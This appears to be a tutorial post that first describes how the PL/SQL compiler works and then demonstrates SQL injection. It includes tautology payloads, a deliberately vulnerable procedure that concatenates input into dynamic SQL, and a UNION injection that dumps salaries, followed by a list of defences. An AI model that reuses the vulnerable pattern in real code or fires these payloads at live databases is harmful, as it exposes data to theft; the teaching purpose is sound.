PLSQL Compiler

SQL compilation implies execution plans generation
PL/SQL compilation implies P-code generation
-------------------------------------------------------------------------------------------------

The Front-end:
--------------
If compiler front-end founds any error, it outputs an error-report and compilation of the unit is aborted. The output of front-end is an internal representation that exactly captures the source code’s semantics. PL/SQL compiler uses DIANA (Descriptive Intermediate Attributed Notation for Ada) for its internal representation. The front-end guarantees that when it does not report an error, the DIANA it generates is correct and needs no further correctness checking.

DIANA:
-------
It is an abstract data type such that each object of the type is a representation of an intermediate form of an Ada program

The Back-end (Code-Generator):
-------------------------------
Back-end takes DIANA as a input and generates an executable representation of the program in the machine code of the target machine. The compiler back-end plays a critical role in generating fast run-time code. The output is the code for PL/SQL Virtual machine.

PL/SQL Virtual Machine:
-----------------------
The instruction set of the PVM is exactly analogous to that of a computer chip. The difference, of course, is that the PVM is implemented in software (it is written in C and linked into the ORACLE executable) while the instruction set of a chip is implemented directly in hardware. A computer implemented in software is commonly called a virtual machine and any interpreted language has such a machine.

Native Compilation of PL/SQL:
-----------------------------

In the native mode, it translates the Machine Code into C source code with the same semantics.

For more details

http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Finnigan.pdf

Impact of SQL Injection

   Retrieval of Crucial Data
   Data Manupulation
   Alter database State
   Revoke Database Service

Developers are ignorant that their above query can be misused to an extent that it can list login names and passwords, which is relevant and crucial information for an organization. An invader can give input as
Code :

p'or upper(s_empname) like'%
p'or'p'='p

Code sql:

SELECT USERNAME, PASSWORD FROM USERS
WHERE USERNAME = ''
OR 1=1

SQL Injection: Example

A procedure P_GET_SAL was created to get the salary of input Employee Id.

Code sql:

CREATE OR REPLACE PROCEDURE P_GET_SAL  (P_ENAME VARCHAR2 DEFAULT NULL)
AS
CUR SYS_REFCURSOR;
V_ENAME VARCHAR2(100);
V_SAL NUMBER;
BEGIN
  V_STMT := 'SELECT ENAME, SALARY FROM EMPLOYEE  WHERE ENAME = '''|| P_ENAME || '''';
  DBMS_OUTPUT.PUT_LINE(V_STMT); 
  OPEN CUR FOR V_STMT;
  LOOP
    FETCH CUR INTO V_ENAME, V_SAL;
    EXIT WHEN CUR%NOTFOUND;
    DBMS_OUTPUT.PUT_LINE('Employee : '||V_ENAME||' draws '||TO_CHAR(V_SAL));
  END LOOP;
  CLOSE CUR;
END;



Code sql:

SQL> EXEC P_GET_SAL(‘KING’);
Employee KING draws 4500

PL/SQL PROCEDURE successfully completed.


Code sql:

SQL> EXEC P_GET_SAL('KING'' UNION SELECT ENAME, SALARY FROM EMPLOYEE WHERE 1=1');
Employee KING draws 4500
Employee ALLEN draws 1200
Employee MIKE draws 3400
Employee KATE draws 2300
Employee PAUL draws 6400
Employee TOMY draws 2700
Employee JENNY draws 6200
Employee JAKES draws 4600

PL/SQL PROCEDURE successfully completed.



Several strategies can be adopted to safeguard the SQL code and eradicate the impacts of SQL injection in applications. Some of them are listed below.

1. Use of Static SQL
2. Using Invoker’s rights
3. Use of Dynamic SQL with bind arguments
4. Validate and sanitize input using DBMS_ASSERT

-------